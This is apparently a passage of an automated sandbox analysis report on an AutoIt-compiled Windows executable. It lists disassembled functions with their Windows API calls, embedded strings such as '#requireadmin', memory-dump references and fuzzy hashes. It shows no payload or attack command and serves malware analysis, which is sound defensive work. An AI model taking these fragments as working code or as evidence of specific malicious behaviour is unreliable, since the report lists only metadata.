Instruction Fuzzy Hash: F041C471518304AAD321FB64DD85FDF77ECAF46350F000A1EF199921A2EF74A688CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B134DD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00B1357C

Strings

question, xrefs: 00B13535
blank, xrefs: 00B134FE
stop, xrefs: 00B1354D
info, xrefs: 00B1351D
warning, xrefs: 00B13565

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: f767431cecc9d2ce6b857b617aa42036a7fb0038b96fb64722d6926efb14f56b
Instruction ID: 194f50256262f926ef1677ccee87ef73c181e12b291409cdaee45bbc548404cd
Opcode Fuzzy Hash: f767431cecc9d2ce6b857b617aa42036a7fb0038b96fb64722d6926efb14f56b
Instruction Fuzzy Hash: 8511EE76649347BE9F005A14DC93CEA77EDDF26F64B50009BFA00A6281F7786FC045A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B147E8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B14802
LoadStringW.USER32(00000000), ref: 00B14809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B1481F
LoadStringW.USER32(00000000), ref: 00B14826
_wprintf.LIBCMT ref: 00B1484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B1486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B14847

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 95accc55ba29c7b4d658f6377989ed7f63f7e3b783e350a3ac2e1b9d7ea245ce
Instruction ID: 3b8659802c976dbc715c104f62bdff1c0fd120a1bf32d61efc2d8b340f972b4a
Opcode Fuzzy Hash: 95accc55ba29c7b4d658f6377989ed7f63f7e3b783e350a3ac2e1b9d7ea245ce
Instruction Fuzzy Hash: 93014FF69102087FEB51E7A49D89EF673ACEB09301F400595BB4AE3041EA749E844B75

Uniqueness

Uniqueness Score: -1.00%

Function 00B3DB04, Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AB29F3

GetSystemMetrics.USER32 ref: 00B3DB42
GetSystemMetrics.USER32 ref: 00B3DB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00B3DD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B3DDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B3DDDC
ShowWindow.USER32(00000003,00000000), ref: 00B3DDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 00B3DE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 00B3DE43

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 578d497d77c328cbaf2f17cd6a8062adbe3f659f23db56148e6d968ce9d9aa2f
Instruction ID: c556a83cc04ced8bfabec0795a3970b4bc349cfc87d427cc8ace22836d3d3be9
Opcode Fuzzy Hash: 578d497d77c328cbaf2f17cd6a8062adbe3f659f23db56148e6d968ce9d9aa2f
Instruction Fuzzy Hash: 9EB18875600225ABDF14CF69D9C57AD7BF1FF04701F2880A9ED489F295DB30AA50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1800, Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e08c016ed62392f808d18d3b93039f1703f3c2a80239370075fd2d114a4fd4c7
Instruction ID: 3281398a643ade887a701037997402699f785bc11a6425024182cdc4205e4230
Opcode Fuzzy Hash: e08c016ed62392f808d18d3b93039f1703f3c2a80239370075fd2d114a4fd4c7
Instruction Fuzzy Hash: 3F716734910109EFCB049F99CC99EEEBB79FF86314F648159F915AB252C730AA51CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B3B9C3, Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00C88258), ref: 00B3BA5D
IsWindowEnabled.USER32(00C88258), ref: 00B3BA69
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00B3BB4D
SendMessageW.USER32(00C88258,000000B0,?,?), ref: 00B3BB84
IsDlgButtonChecked.USER32(?,?), ref: 00B3BBC1
GetWindowLongW.USER32(00C88258,000000EC), ref: 00B3BBE3
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00B3BBFB

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: a4ffb4909431effdc66094b11dd134750b200f49dfa2fe97711016f78602609b
Instruction ID: 4eea0420e8e8f3fdf78443e249ce4f17544503a762a75375acd48f14a1e965b8
Opcode Fuzzy Hash: a4ffb4909431effdc66094b11dd134750b200f49dfa2fe97711016f78602609b
Instruction Fuzzy Hash: B271BD34604604AFDB249F54C8D4FBABBF9EF0A300F2440D9EA5A97269DF31AD51DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B0FE19, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00B0FE2C
__wcsnicmp.LIBCMT ref: 00B0FE4D
__wcsnicmp.LIBCMT ref: 00B0FE67

Strings

#notrayicon, xrefs: 00B0FE24
#requireadmin, xrefs: 00B0FE47
#OnAutoItStartRegister, xrefs: 00B0FE61

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 55814f3b35064c5137181ee01a59a75937a970c7d0294376984b0cafbed5545e
Instruction ID: b805a8cad79444bfc6363ad76072718e191697262df199980aed263ceb389c21
Opcode Fuzzy Hash: 55814f3b35064c5137181ee01a59a75937a970c7d0294376984b0cafbed5545e
Instruction Fuzzy Hash: D421463230421366D730BA24DD16FBB7BD8EF51740F54447AF84686AE3EBA19E82C395

Uniqueness

Uniqueness Score: -1.00%

Function 00AD41B9, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00AD4282,?), ref: 00AD41D3
GetProcAddress.KERNEL32(00000000), ref: 00AD41DA
EncodePointer.KERNEL32(00000000), ref: 00AD41E6
DecodePointer.KERNEL32(00000001,00AD4282,?), ref: 00AD4203

Strings

combase.dll, xrefs: 00AD41CE
RoInitialize, xrefs: 00AD41C2

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 17d2b472215c9741fafbb56109207e8ea2e35a5892827cb4844f8e0933d2abe6
Instruction ID: 2c695c57b7f24b6a91f90032a4ece76b3f8b7fb6c55391963a4c221a4bb72a5f
Opcode Fuzzy Hash: 17d2b472215c9741fafbb56109207e8ea2e35a5892827cb4844f8e0933d2abe6
Instruction Fuzzy Hash: 02E0EDB8560701AFEA206F70DC4DB043994B715B06F904524B645E75B0CFF54284AF04

Uniqueness

Uniqueness Score: -1.00%

Function 00AD428E, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00AD41A8), ref: 00AD42A8
GetProcAddress.KERNEL32(00000000), ref: 00AD42AF
EncodePointer.KERNEL32(00000000), ref: 00AD42BA
DecodePointer.KERNEL32(00AD41A8), ref: 00AD42D5

Strings

combase.dll, xrefs: 00AD42A3
RoUninitialize, xrefs: 00AD4297

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 35e7ff7f21d7c507dbd4b6b88da6ef651f0411f9484e00388daaa02399ba5ec3
Instruction ID: c210060b251f683d1b611d0ac5c1ebae89c94384033ce9c6c3c224c937c94a9a
Opcode Fuzzy Hash: 35e7ff7f21d7c507dbd4b6b88da6ef651f0411f9484e00388daaa02399ba5ec3
Instruction Fuzzy Hash: B2E0B674960B00AFEB20AF60AD0DB443AA4BB09B03F940525F205E79F0CFF44784DA14

Uniqueness

Uniqueness Score: -1.00%

Function 00AB218F, Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 00AB21B8
GetWindowRect.USER32 ref: 00AB21F9
ScreenToClient.USER32 ref: 00AB2221
GetClientRect.USER32 ref: 00AB2350
GetWindowRect.USER32 ref: 00AB2369

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 52efc2e7552569f308f32ac1aa4b6b1a6df877f0b5f50735c87b48156eba79d7
Instruction ID: 31de0b5b43f2ff3f1cccffe0d36b3ebb96e070a9f9526b01b21dfd6d3252c621
Opcode Fuzzy Hash: 52efc2e7552569f308f32ac1aa4b6b1a6df877f0b5f50735c87b48156eba79d7
Instruction Fuzzy Hash: C3B18F3991024ADBDF10CFA9C9847EEB7B5FF08310F14812AED59EB255DB34AA50CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00B16A73, Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B16BC6
_memmove.LIBCMT ref: 00B16B01

Part of subcall function 00AB4D37: __itow.LIBCMT ref: 00AB4D62
Part of subcall function 00AB4D37: __swprintf.LIBCMT ref: 00AB4DAC

Part of subcall function 00AD0FE6: _malloc.LIBCMT ref: 00AD0FFE

_memmove.LIBCMT ref: 00B16B74
_memmove.LIBCMT ref: 00B16C5B
_memmove.LIBCMT ref: 00B16C74
_memmove.LIBCMT ref: 00B16C90

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$__itow__swprintf_malloc
String ID:
API String ID: 83262069-0
Opcode ID: 2725d46ddbc75e0616ee031f771a39d94f6f00bf8df58420bfa2fe342b6a9c4e
Instruction ID: 7f11bba557dea80be139c4055911c9c95ea2c3654b7e1df238e361915e97ca6c
Opcode Fuzzy Hash: 2725d46ddbc75e0616ee031f771a39d94f6f00bf8df58420bfa2fe342b6a9c4e
Instruction Fuzzy Hash: 0861A13150025AABCF15EF64CD82EFE37A8EF09308F454599F8965B293DB349D85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B129B1, Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B129FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B12A4A
IsMenu.USER32 ref: 00B12A6A
CreatePopupMenu.USER32(00B77890,00000000,774233D0), ref: 00B12A9E
GetMenuItemCount.USER32 ref: 00B12AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B12B2D

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 14ff5c0aa0cd27076a91c327713c62359491a3989137f159a533d106394b11fa
Instruction ID: 9b7dc93464d3e34f9695f2a05ead7c7470d7690091e17672d96c58fd9f64b613
Opcode Fuzzy Hash: 14ff5c0aa0cd27076a91c327713c62359491a3989137f159a533d106394b11fa
Instruction Fuzzy Hash: B751CD30604249DFCF20CF68D888BEEBBF4EF15314F5041A9E8129B2A0D7709AA5CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1B41, Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00AB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AB29F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00AB1B76
GetWindowRect.USER32 ref: 00AB1BDA
ScreenToClient.USER32 ref: 00AB1BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AB1C08
EndPaint.USER32(?,?), ref: 00AB1C52

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 747801b82201e72a950cb08338a7871f9414bbf1f0879ef6b09361ba367eef92
Instruction ID: bea05d771b2e682906a818fb479d0fd6c128b788a232f3ad9ea9ff64b2a09815
Opcode Fuzzy Hash: 747801b82201e72a950cb08338a7871f9414bbf1f0879ef6b09361ba367eef92
Instruction Fuzzy Hash: 0241A131144301AFD711DF25CC98FAA7BF8FB46360F140669FAA9872A2CB309945DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B3BD10, Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00B777B0,00000000,00C88258,?,?,00B777B0,?,00B3BC1A,?,?), ref: 00B3BD84
EnableWindow.USER32(?,00000000), ref: 00B3BDA8
ShowWindow.USER32(00B777B0,00000000,00C88258,?,?,00B777B0,?,00B3BC1A,?,?), ref: 00B3BE08
ShowWindow.USER32(?,00000004,?,00B3BC1A,?,?), ref: 00B3BE1A
EnableWindow.USER32(?,00000001), ref: 00B3BE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B3BE61

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: f8282c714b3cfb86401a904f9ea282651a5cd92e6575db1a8a19465bd8d1d29a
Instruction ID: b59c5707c12bfa157780d7680c9d646fd3a8cbb0c853aef2b4df0782e3a01fe7
Opcode Fuzzy Hash: f8282c714b3cfb86401a904f9ea282651a5cd92e6575db1a8a19465bd8d1d29a
Instruction Fuzzy Hash: 44414935600154AFDB26CF28C489FA47BE1FF46314F2841F9EB498F2A6CB31A845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B09431, Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B08CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B08CDE
Part of subcall function 00B08CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B08CE8
Part of subcall function 00B08CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B08CF7
Part of subcall function 00B08CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B08CFE
Part of subcall function 00B08CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B08D14

GetLengthSid.ADVAPI32(?,00000000,00B0904D), ref: 00B09482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B0948E
HeapAlloc.KERNEL32(00000000), ref: 00B09495
CopySid.ADVAPI32(00000000,00000000,?), ref: 00B094AE
GetProcessHeap.KERNEL32(00000000,00000000,00B0904D), ref: 00B094C2
HeapFree.KERNEL32(00000000), ref: 00B094C9

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 26e38340c95cb298ddc06e70379f3ef11875617a3d7fb20c4c4a45c43c930332
Instruction ID: 9275fc48e29ba9be3ab9a5e9c46ce79fe855e9eceb2dae62256596c98eeab734
Opcode Fuzzy Hash: 26e38340c95cb298ddc06e70379f3ef11875617a3d7fb20c4c4a45c43c930332
Instruction Fuzzy Hash: AB11AF75511604EFDB209FA4CC49BAE7BE9FB46315F108198FA85A7251CB359A01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B3C552, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00AB16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB1729
Part of subcall function 00AB16CF: SelectObject.GDI32(?,00000000), ref: 00AB1738
Part of subcall function 00AB16CF: BeginPath.GDI32(?), ref: 00AB174F
Part of subcall function 00AB16CF: SelectObject.GDI32(?,00000000), ref: 00AB1778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B3C57C
LineTo.GDI32(00000000,00000003,?), ref: 00B3C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B3C59E
LineTo.GDI32(00000000,00000000,?), ref: 00B3C5AE
EndPath.GDI32(00000000), ref: 00B3C5BE
StrokePath.GDI32(00000000), ref: 00B3C5CE

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: abff56705dd892d9d1117ba9390a8f70d5b11eb72b9f24349f00be9b99e2464d
Instruction ID: c8994f623594e8e9a2637aefa43de2aad7dd7e94b2cc084f7698375f499cadc6
Opcode Fuzzy Hash: abff56705dd892d9d1117ba9390a8f70d5b11eb72b9f24349f00be9b99e2464d
Instruction Fuzzy Hash: 3111097604010CBFDB12AF91DC89EAA7FADFB09354F048051BA199A161CB71AE95DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AD07BB, Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AD07EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 00AD07F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AD07FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AD080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00AD0812
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AD081A

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d1ff2b16cef4e48c2bef2b7934eca221390b6873234b6d7dee57a0d9ea7bd580
Instruction ID: da4c6a2f46ec81089ecde8c393985d270715d64776723b7b647c205b52f97ddf
Opcode Fuzzy Hash: d1ff2b16cef4e48c2bef2b7934eca221390b6873234b6d7dee57a0d9ea7bd580
Instruction Fuzzy Hash: 95016CB09027597DE3009F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00B177EB, Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00B177FE
EnterCriticalSection.KERNEL32(?,?,00ABC2B6,?,?), ref: 00B1780F
TerminateThread.KERNEL32(00000000,000001F6,?,00ABC2B6,?,?), ref: 00B1781C
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00ABC2B6,?,?), ref: 00B17829

Part of subcall function 00B171F0: CloseHandle.KERNEL32(00000000,?,00B17836,?,00ABC2B6,?,?), ref: 00B171FA

InterlockedExchange.KERNEL32(?,000001F6), ref: 00B1783C
LeaveCriticalSection.KERNEL32(?,?,00ABC2B6,?,?), ref: 00B17843

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 09657bc264f0f7f4ec144272b055a6254727d4835df0edccd2d316bfc7d283ac
Instruction ID: 96003bd972ab31f925297bfac9b23bfa3f4de5dce7b4b2ab41ae0e2e36bb0b7a
Opcode Fuzzy Hash: 09657bc264f0f7f4ec144272b055a6254727d4835df0edccd2d316bfc7d283ac
Instruction Fuzzy Hash: 09F054361A5211ABD7113B58EC8CAEB7779FF46701B540461F203A70A0CFB55A51CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B0954A, Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B09555
UnloadUserProfile.USERENV(?,?), ref: 00B09561
CloseHandle.KERNEL32(?), ref: 00B0956A
CloseHandle.KERNEL32(?), ref: 00B09572
GetProcessHeap.KERNEL32(00000000,?), ref: 00B0957B
HeapFree.KERNEL32(00000000), ref: 00B09582

Memory Dump Source

Source File: 00000001.00000002.211309828.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.211301554.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211564574.0000000000B40000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211604166.0000000000B66000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.211624959.0000000000B70000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.211658604.0000000000B79000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
